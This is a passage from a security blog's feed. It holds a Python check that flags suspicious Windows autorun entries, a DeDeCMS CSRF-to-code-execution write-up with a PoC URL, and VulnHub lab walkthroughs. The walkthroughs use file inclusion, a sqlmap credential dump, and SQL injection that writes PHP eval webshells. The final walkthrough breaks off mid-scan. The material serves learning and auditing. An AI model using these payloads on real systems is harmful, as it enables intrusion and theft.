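# from the user's temp directory, the default location of the persistence
# payload (%TEMP%) according to the notes above.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    xZqKlm    REG_SZ    wscript.exe //B //NoLogo C:\Users\alice\AppData\Local\Temp\xZqKlm.vbs
    Updater    REG_SZ    C:\Users\alice\AppData\Local\Temp\upd.exe
"""

# `reg query` prints each value as: name, type, data, separated by runs of spaces.
REG_VALUE = re.compile(r"^\s{2,}(.+?)\s{2,}(REG_\w+)\s{2,}(.*)$")
# Drive-letter or %VAR%-rooted Windows paths inside a command line.
WIN_PATH = re.compile(r'(?:[A-Za-z]:\\|%\w+%\\?)[^\s"]*')
# Interpreters that run whatever script or DLL is handed to them (heuristic list).
SCRIPT_HOSTS = ("wscript", "cscript", "mshta", "powershell", "rundll32", "regsvr32")


def parse_reg_query(text):
    """Return [(value_name, command_line)] from `reg query` output."""
    entries = []
    for line in text.splitlines():
        m = REG_VALUE.match(line)
        if m:
            entries.append((m.group(1), m.group(3)))
    return entries


def launched_program(command):
    """Base name (no directory, no extension, lower-case) of the program a
    command line starts; handles a quoted path containing spaces."""
    command = command.strip()
    if not command:
        return ""
    if command.startswith('"'):
        first = command[1:].split('"', 1)[0]
    else:
        first = command.split(None, 1)[0]
    return first.rsplit("\\", 1)[-1].split(".")[0].lower()


def autorun_findings(entries):
    """Return {value_name: [reasons]} for autorun entries worth a closer look:
    anything executed from a temp directory, and anything started through a
    script host, which is how a dropped script rather than an installed
    program gets launched at logon."""
    findings = {}
    for name, command in entries:
        reasons = []
        for path in WIN_PATH.findall(command):
            low = path.lower()
            if "\\temp\\" in low or low.startswith(("%temp%", "%tmp%")):
                reasons.append("runs from a temp directory: " + path)
        program = launched_program(command)
        if program in SCRIPT_HOSTS:
            reasons.append("started through script host " + program)
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in autorun_findings(parse_reg_query(SAMPLE_REG_QUERY)).items():
        print(name + ": " + "; ".join(reasons))
```

Run the same check over the HKLM Run key when the -X (start at boot) or -S (service) options are in play, since those do not touch the per-user key.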
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="metasploit" scheme="http://yoursite.com/tags/metasploit/"/>
</entry>
<entry>
<title>DeDecms v5.7 sp2 CSRF + File Operation: Front-End getshell</title>
<link href="http://yoursite.com/2019/05/12/DeDecms-v5-7-sp2-CRSF-%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C-%E5%89%8D%E5%8F%B0getshell/"/>
<id>http://yoursite.com/2019/05/12/DeDecms-v5-7-sp2-CRSF-文件操作-前台getshell/</id>
<published>2019-05-12T13:30:29.000Z</published>
<updated>2020-03-14T15:36:41.482Z</updated>
<content type="html"><![CDATA[<p>在plus/search.php中:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">if(empty($typeid))</span><br><span class="line">{</span><br><span class="line"> $typenameCacheFile = DEDEDATA.'/cache/typename.inc';</span><br><span class="line"> if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )</span><br><span class="line"> {</span><br><span class="line"> $fp = fopen(DEDEDATA.'/cache/typename.inc', 'w');</span><br><span class="line"> fwrite($fp, "<"."?php\r\n");</span><br><span class="line"> $dsql->SetQuery("Select id,typename,channeltype From `#@__arctype`");</span><br><span class="line"> $dsql->Execute();</span><br><span class="line"> while($row = $dsql->GetArray())</span><br><span class="line"> {</span><br><span class="line"> fwrite($fp, "\$typeArr[{$row['id']}] = '{$row['typename']}';\r\n"); 
//存在漏洞</span><br><span class="line"> }</span><br><span class="line"> fwrite($fp, '?'.'>');</span><br><span class="line"> fclose($fp);</span><br><span class="line"> }</span><br><span class="line"> //引入栏目缓存并看关键字是否有相关栏目内容</span><br><span class="line"> require_once($typenameCacheFile);</span><br><span class="line"> if(isset($typeArr) && is_array($typeArr))</span><br><span class="line"> {</span><br><span class="line"> foreach($typeArr as $id=>$typename)</span><br><span class="line"> {</span><br><span class="line"> //$keywordn = str_replace($typename, ' ', $keyword);</span><br><span class="line"> $keywordn = $keyword;</span><br><span class="line"> if($keyword != $keywordn)</span><br><span class="line"> {</span><br><span class="line"> $keyword = HtmlReplace($keywordn);</span><br><span class="line"> $typeid = intval($id);</span><br><span class="line"> break;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>该段代码会将数据库中读取的栏目信息写入typename.inc文件中,然后require_once()包含该文件,写文件的代码如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fwrite($fp, "\$typeArr[{$row['id']}] = '{$row['typename']}';\r\n");</span><br></pre></td></tr></table></figure></p><p>$row[‘typename’]是可控参数,如果值是 1’;phpinfo();// 这样的形式,写入的字符串为:$typeArr[2] = ‘1’;phpinfo();//‘;<br>从而require_once()包含该文件后就会执行phpinfo()<br>通过查找,dede/catalog_add.php中可以控制该参数:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span 
class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span 
class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br></pre></td><td class="code"><pre><span class="line">else if($dopost=='save')</span><br><span class="line">{</span><br><span class="line"> $smalltypes = '';</span><br><span class="line"> if(empty($smalltype)) $smalltype = '';</span><br><span class="line"> if(is_array($smalltype)) $smalltypes = join(',',$smalltype);</span><br><span class="line"> </span><br><span class="line"> if(!isset($sitepath)) $sitepath = '';</span><br><span class="line"> if($topid==0 && $reid>0) $topid = $reid;</span><br><span class="line"> if($ispart!=0) $cross = 0;</span><br><span class="line"> </span><br><span class="line"> $description = Html2Text($description,1);</span><br><span class="line"> $keywords = Html2Text($keywords,1);</span><br><span class="line"> </span><br><span class="line"> if($ispart != 2 )</span><br><span class="line"> {</span><br><span class="line"> //reference directory for the category</span><br><span class="line"> if($referpath=='cmspath') $nextdir = '{cmspath}';</span><br><span class="line"> if($referpath=='basepath') $nextdir = '';</span><br><span class="line"> //name the directory with pinyin</span><br><span class="line"> if($upinyin==1 || $typedir=='')</span><br><span class="line"> {</span><br><span class="line"> $typedir = GetPinyin(stripslashes($typename));</span><br><span class="line"> }</span><br><span class="line"> $typedir = $nextdir.'/'.$typedir;</span><br><span class="line"> $typedir = preg_replace("#\/{1,}#", "/", $typedir);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> //settings when multi-site is enabled (top-level categories only)</span><br><span class="line"> if($reid==0 && $moresite==1)</span><br><span class="line"> {</span><br><span class="line"> $sitepath = $typedir;</span><br><span class="line"></span><br><span class="line"> //check the bound secondary domain</span><br><span 
class="line"> if($siteurl!='')</span><br><span class="line"> {</span><br><span class="line"> $siteurl = preg_replace("#\/$#", "", $siteurl);</span><br><span class="line"> if(!preg_match("#http:\/\/#i", $siteurl))</span><br><span class="line"> {</span><br><span class="line"> ShowMsg("你绑定的二级域名无效,请用(http://host)的形式!","-1");</span><br><span class="line"> exit();</span><br><span class="line"> }</span><br><span class="line"> if(preg_match("#".$cfg_basehost."#i", $siteurl))</span><br><span class="line"> {</span><br><span class="line"> ShowMsg("你绑定的二级域名与当前站点是同一个域,不需要绑定!","-1");</span><br><span class="line"> exit();</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> //create the directory</span><br><span class="line"> if($ispart != 2)</span><br><span class="line"> {</span><br><span class="line"> $true_typedir = str_replace("{cmspath}", $cfg_cmspath, $typedir);</span><br><span class="line"> $true_typedir = preg_replace("#\/{1,}#", "/", $true_typedir);</span><br><span class="line"> if(!CreateDir($true_typedir))</span><br><span class="line"> {</span><br><span class="line"> ShowMsg("创建目录 {$true_typedir} 失败,请检查你的路径是否存在问题!","-1");</span><br><span class="line"> exit();</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> $in_query = "INSERT INTO `#@__arctype`(reid,topid,sortrank,typename,typedir,isdefault,defaultname,issend,channeltype,</span><br><span class="line"> tempindex,templist,temparticle,modname,namerule,namerule2,</span><br><span class="line"> ispart,corank,description,keywords,seotitle,moresite,siteurl,sitepath,ishidden,`cross`,`crossid`,`content`,`smalltypes`)</span><br><span class="line"> VALUES('$reid','$topid','$sortrank','$typename','$typedir','$isdefault','$defaultname','$issend','$channeltype',</span><br><span class="line"> '$tempindex','$templist','$temparticle','default','$namerule','$namerule2',</span><br><span class="line"> '$ispart','$corank','$description','$keywords','$seotitle','$moresite','$siteurl','$sitepath','$ishidden','$cross','$crossid','$content','$smalltypes')";</span><br><span class="line"></span><br><span class="line"> if(!$dsql->ExecuteNoneQuery($in_query))</span><br><span class="line"> {</span><br><span class="line"> ShowMsg("保存目录数据时失败,请检查你的输入资料是否存在问题!","-1");</span><br><span class="line"> exit();</span><br><span class="line"> }</span><br><span class="line"> UpDateCatCache();</span><br><span class="line"> if($reid>0)</span><br><span class="line"> {</span><br><span class="line"> PutCookie('lastCid',GetTopid($reid),3600*24,'/');</span><br><span class="line"> }</span><br><span class="line"> ShowMsg("成功创建一个分类!","catalog_main.php");</span><br><span class="line"> exit();</span><br><span class="line"></span><br><span class="line">}//End dopost==save</span><br></pre></td></tr></table></figure></p><p>This code adds a category record and has no CSRF protection whatsoever, so the following URL can be visited while logged in as administrator:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/dedecms/dede/catalog_add.php?dopost=save&typename=';phpinfo();//</span><br></pre></td></tr></table></figure></p><p>or an administrator can be tricked into clicking the link; either way a row containing the malicious code is inserted into the table.<br>Visiting the front-end page <a href="http://127.0.0.1/dedecms/plus/search.php" target="_blank" rel="noopener">http://127.0.0.1/dedecms/plus/search.php</a> then writes the malicious code into typename.inc, after which require_once() includes the file and executes it.</p><h3 id="poc"><a href="#poc" class="headerlink" title="poc"></a>poc</h3><p>Construct the link:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/dedecms/dede/catalog_add.php?dopost=save&typename=';phpinfo();//</span><br></pre></td></tr></table></figure></p><p>Visit it as administrator, or trick an administrator into clicking it, then visit the front-end page <a href="http://127.0.0.1/dedecms/plus/search.php" target="_blank" rel="noopener">http://127.0.0.1/dedecms/plus/search.php</a><br>The malicious code is executed:<br><img src="/2019/05/12/DeDecms-v5-7-sp2-CRSF-文件操作-前台getshell/1.png" alt=""><br>Inspecting typename.inc confirms that the malicious code was written into it:<br><img src="/2019/05/12/DeDecms-v5-7-sp2-CRSF-文件操作-前台getshell/2.png" alt=""></p>]]></content>
<summary type="html">
<p>In plus/search.php:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line
</summary>
<category term="web安全" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/"/>
<category term="代码审计" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="代码审计" scheme="http://yoursite.com/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
</entry>
<entry>
<title>VulnHub-Acid Server Writeup</title>
<link href="http://yoursite.com/2019/04/26/VulnHub-Acid-Server-Writeup/"/>
<id>http://yoursite.com/2019/04/26/VulnHub-Acid-Server-Writeup/</id>
<published>2019-04-26T03:04:56.000Z</published>
<updated>2019-04-26T03:05:47.081Z</updated>
<content type="html"><![CDATA[<h2 id="目标"><a href="#目标" class="headerlink" title="目标"></a>Goal</h2><p>Escalate the privileges to root and capture the flag. Once anyone is able to beat the machine, please let me know.</p><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>Information Gathering</h2><h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>Port Scan</h3><blockquote><blockquote><p>nmap -p 1-65535 -T4 -A -v 192.168.1.101<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">33447/tcp open http Apache httpd 2.4.10 ((Ubuntu))</span><br><span class="line">| http-methods: </span><br><span class="line">|_ Supported Methods: GET HEAD POST OPTIONS</span><br><span class="line">|_http-server-header: Apache/2.4.10 (Ubuntu)</span><br><span class="line">|_http-title: /Challenge</span><br><span class="line">MAC Address: 00:0C:29:6F:66:8B (VMware)</span><br><span class="line">Device type: general purpose</span><br><span class="line">Running: Linux 3.X|4.X</span><br><span class="line">OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4</span><br><span class="line">OS details: Linux 3.2 - 4.9</span><br><span class="line">Uptime guess: 198.840 days (since Sun Oct 7 03:09:34 2018)</span><br><span class="line">Network Distance: 1 hop</span><br><span class="line">TCP Sequence Prediction: Difficulty=261 (Good luck!)</span><br><span class="line">IP ID Sequence Generation: All 
zeros</span><br></pre></td></tr></table></figure></p></blockquote></blockquote><h3 id="页面信息"><a href="#页面信息" class="headerlink" title="页面信息"></a>Page Information</h3><p>In the source of index.php:<br>0x643239334c6d70775a773d3d<br>d293LmpwZw==<br>wow.jpg </p><blockquote><blockquote><p>strings wow.jpg<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">"""%%%)))///333777999>>>@@@DDDKKKOOORRRUUU[[[^^^cccfffkkknnnssswwwxxx~~~</span><br><span class="line"></span><br><span class="line">"%)/379>@DKORU[^cfknswx~</span><br></pre></td></tr></table></figure></p></blockquote></blockquote><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">37:61:65:65:30:66:36:64: </span><br><span class="line">35:38:38:65:64:39:39:30: </span><br><span class="line">35:65:65:33:37:66:31:36: </span><br><span class="line">61:37:63:36:31:30:64:34 </span><br><span class="line"></span><br><span class="line">7:a:e:e:0:f:6:d </span><br><span class="line">5:8:8:e:d:9:9:0 </span><br><span class="line">5:e:e:3:7:f:1:6 </span><br><span class="line">a:7:c:6:1:0:d:4 </span><br><span class="line"></span><br><span class="line">63425</span><br></pre></td></tr></table></figure><p>Directory: /Challenge</p><h3 id="dirbruter扫描目录"><a href="#dirbruter扫描目录" class="headerlink" title="dirbruter扫描目录"></a>Directory scan with dirbruter</h3><p>/Challenge contains:<br>index.php<br>error.php<br>cake.php<br>hacked.php<br>include.php </p><h4 id="利用文件包含漏洞"><a href="#利用文件包含漏洞" class="headerlink" title="利用文件包含漏洞"></a>Exploiting the file inclusion vulnerability</h4><p>The page source of include.php contains:<br>0x59 33 56 6a 4c 6e 4a 34 62 6e 41 3d<br>Y3VjLnJ4bnA=<br>cuc.rxnp</p><p>Read the hacked.php file:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.1.103:33447/Challenge/include.php</span><br><span class="line">?file=php://filter/convert.base64-encode/resource=hacked.php&add=Extract+File</span><br></pre></td></tr></table></figure></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span 
class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line">include_once 'includes/db_connect.php';</span><br><span class="line">include_once 'includes/functions.php';</span><br><span class="line"></span><br><span class="line">sec_session_start();</span><br><span class="line"></span><br><span class="line">if (!isset($_SESSION['protected_page'])){</span><br><span class="line">header('Location: protected_page.php');</span><br><span class="line">exit;</span><br><span class="line">}</span><br><span class="line">if (!isset($_SESSION['index_page'])){</span><br><span class="line">header('Location: protected_page.php');</span><br><span class="line">exit;</span><br><span class="line">}</span><br><span class="line">?></span><br><span class="line"><!DOCTYPE html></span><br><span class="line"><html></span><br><span class="line"><head></span><br><span class="line"><meta charset="UTF-8"></span><br><span class="line"><link rel="stylesheet" href="css/style.css"></span><br><span class="line"><link rel="stylesheet" href="styles/main.css" /></span><br><span class="line"><title>Try to Extract Juicy details</title></span><br><span class="line"></head></span><br><span class="line"><body></span><br><span class="line"><div class="wrapper"></span><br><span class="line"> <div class="container"></span><br><span class="line"><?php</span><br><span class="line">if(isset($_REQUEST['add']))</span><br><span class="line">{</span><br><span class="line">$dbhost = 'localhost';</span><br><span class="line">$dbuser = 'root';</span><br><span 
class="line">$dbpass = 'mehak';</span><br><span class="line">$conn = mysql_connect($dbhost, $dbuser, $dbpass);</span><br><span class="line">if(! $conn )</span><br><span class="line">{</span><br><span class="line"> die('Could not connect: ' . mysql_error());</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">$id = $_POST['id'];</span><br><span class="line">$sql = "SELECT * FROM members WHERE ID = (('$id'))";</span><br><span class="line">mysql_select_db('secure_login');</span><br><span class="line">$retval = mysql_query( $sql, $conn );</span><br><span class="line">if(! $retval )</span><br><span class="line">{</span><br><span class="line"> die('Could not enter data: ' . mysql_error());</span><br><span class="line">}</span><br><span class="line">echo "You have entered ID successfully...Which is not a big deal :D\n";</span><br><span class="line">mysql_close($conn);</span><br><span class="line">}</span><br><span class="line">?></span><br><span class="line"> <p> <h1>You are going Good...Show me your Ninja Skills.</h1> <br> </span><br><span class="line"><form method="get" action="<?php $_PHP_SELF ?>"></span><br><span class="line">Enter your ID:<input name="id" placeholder="id" type="text" id="id" maxlength="20"></span><br><span class="line"><input name="add" type="submit" id="add" value="Add ID"></span><br><span class="line"></span><br><span class="line"></body></span><br><span class="line"></html></span><br></pre></td></tr></table></figure><p>A SQL injection vulnerability is found ($id goes unescaped into the query); run sqlmap against it</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u "http://192.168.1.103:33447/Challenge/hacked.php" --data "add=1&id=1" --cookie="sec_session_id=4ua5he692ts3mo6c71oo6i6qn7" --dump -C "email,password,username" -T"members" -D "secure_login"</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">+------------------------+----------------------------------------------------------------------------------------------------------------------------------+-----------+</span><br><span class="line">| email | password | username |</span><br><span class="line">+------------------------+----------------------------------------------------------------------------------------------------------------------------------+-----------+</span><br><span class="line">| [email protected] | 53b9bd4416ec581838c4bde217e09f1206b94cdb95475cddda862894f4dbbeec5ceacc2e116a64cb56d8384404738c5fd16478e0266962eeb3b61da1918d5931 | Acid |</span><br><span class="line">| [email protected] | c124191d7a267cb2b83b2c59a30b2e388b77f13955340015462bffc0d90cfa7b402ecb8e3fc82717f22b127c98a4afa9ed4f3661d824c6c57a1490f9963d9234 | saman |</span><br><span class="line">| [email protected] | 00807432eae173f652f2064bdca1b61b290b52d40e429a7d295d76a71084aa96c0233b82f1feac45529e0726559645acaed6f3ae58a286b9f075916ebf66cacc | test_user |</span><br><span class="line">| [email protected] | fb8db054a75254633052d951002065109cd96fe990bf5a5d5bd1581d3578235a69224784b29870046d21d95567cdfe292221fbabce17201b23ca0fd5ee4fa20e | Vivek |</span><br><span class="line">+------------------------+----------------------------------------------------------------------------------------------------------------------------------+-----------+</span><br></pre></td></tr></table></figure><p>None of the hashes could be cracked.</p><p>Tried password combinations:<br>cuc.rxnp63425<br>63425cuc.rxnp<br>Failed</p><h3 id="sql注入写马"><a href="#sql注入写马" class="headerlink" title="sql注入写马"></a>Writing a webshell via SQL injection</h3><p>id=1')) union select 1,2,3,4,'<?php @eval($_POST[cmd]); ?>' into outfile '/tmp/123.php'--%20%20</p><p>The one-line webshell is written successfully; include it through include.php:<br><a href="http://192.168.1.104:33447/Challenge/include.php?file=/tmp/123.php&add=Extract+File" target="_blank" rel="noopener">http://192.168.1.104:33447/Challenge/include.php?file=/tmp/123.php&add=Extract+File</a><br>POST: cmd=phpinfo(); </p><p>phpinfo is displayed and reveals the web root /var/www/html/Challenge/. Because include.php requires the session cookie, connecting with Caidao through it is awkward, so write another one-line webshell into that directory.<br>cmd=file_put_contents("/var/www/html/Challenge/hack.php","<?php @eval($_POST[a]); ?>");&a=$_POST[a] </p><p>Connect with Caidao. </p><h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>Privilege Escalation</h2><p>A file named VXNlcnMudHh0 is found under /Challenge; base64-decoded, the name is Users.txt<br>Content: zbp.yvnzt@qvpn </p><p>Y0dGemN5NTBlSFE9 decodes to pass.txt<br>Content: __341xnurZ</p><p>Find files owned by the user:</p><blockquote><blockquote><p>find / -user acid 2>/dev/null </p></blockquote></blockquote><p>A packet capture is found; analysing it reveals saman's password: 1337hax0r </p><p>Switch to that user and find flag.txt</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h2><h3 id="存在的问题"><a href="#存在的问题" class="headerlink" title="存在的问题"></a>Problems encountered</h3><p>1. Too much time was spent on exploiting the web vulnerabilities, even though the exploitation was not hard.<br>2. After obtaining a shell I did not know how to escalate privileges and browsed files at random without a clue. </p><h3 id="解决"><a href="#解决" class="headerlink" title="解决"></a>Solutions</h3><p>Goal-driven penetration:</p><ul><li>The purpose of exploiting a web vulnerability is to obtain a shell; on that basis, exploit the vulnerability in the fastest, simplest and stealthiest way to get the shell.</li><li>The essence of penetration testing is information gathering: based on the goal, collect detailed information about the target (ports, directories, user files, system files, installed software and so on); the more detailed, the better.</li></ul>]]></content>
<summary type="html">
<h2 id="目标"><a href="#目标" class="headerlink" title="目标"></a>Goal</h2><p>Escalate the privileges to root and capture the flag. Once anyone able
</summary>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
</entry>
<entry>
<title>VulnHub-Freshly Writeup</title>
<link href="http://yoursite.com/2019/04/19/VulnHub-Freshly-Writeup/"/>
<id>http://yoursite.com/2019/04/19/VulnHub-Freshly-Writeup/</id>
<published>2019-04-19T04:45:50.000Z</published>
<updated>2019-04-19T05:11:19.626Z</updated>
<content type="html"><![CDATA[<h2 id="目标"><a href="#目标" class="headerlink" title="目标"></a>Goal</h2><p>The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. If you can find the secret, send me an email for verification. :)</p><p>There are a couple of different ways that you can go with this one. Good luck!</p><p>Simply download and import the OVA file into virtualbox!</p><p>VulnHub note: You may have issues when importing to VMware. If this is the case, extract the HDD from the OVA file (using something like 7zip), and attach to a new VM. Please see the following guide: <a href="https://jkad.github.io/blog/2015/04/12/how-to-import-the-top-hat-sec-vms-into-vmware/" target="_blank" rel="noopener">https://jkad.github.io/blog/2015/04/12/how-to-import-the-top-hat-sec-vms-into-vmware/</a>.</p><h2 id="信息搜集"><a href="#信息搜集" class="headerlink" title="信息搜集"></a>Information Gathering</h2><h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>Port Scan</h3><p>Quick scan</p><blockquote><blockquote><p>nmap -T4 -F 192.168.1.104</p></blockquote></blockquote><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Nmap scan report for 192.168.1.104</span><br><span class="line">Host is up (0.00018s latency).</span><br><span class="line">Not shown: 97 closed ports</span><br><span class="line">PORT STATE SERVICE</span><br><span class="line">80/tcp open http</span><br><span class="line">443/tcp open https</span><br><span class="line">8080/tcp open http-proxy</span><br><span class="line">MAC Address: 08:00:27:D4:BC:A6 (Oracle VirtualBox virtual NIC)</span><br></pre></td></tr></table></figure><p>Port 80 serves a single image:<br><img src="/2019/04/19/VulnHub-Freshly-Writeup/1.png" alt=""></p><p>The main site is found on port 8080: <a href="http://192.168.1.104:8080/wordpress/" target="_blank" rel="noopener">http://192.168.1.104:8080/wordpress/</a><br><img src="/2019/04/19/VulnHub-Freshly-Writeup/2.png" alt=""><br>It is a WordPress site</p><h3 id="wpscan扫描"><a href="#wpscan扫描" class="headerlink" title="wpscan扫描"></a>wpscan scan</h3><p>Scan targeted at WordPress: </p><blockquote><blockquote><p>wpscan --url <a href="http://192.168.1.104:8080/wordpress/" target="_blank" rel="noopener">http://192.168.1.104:8080/wordpress/</a></p></blockquote></blockquote><p>Results:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span 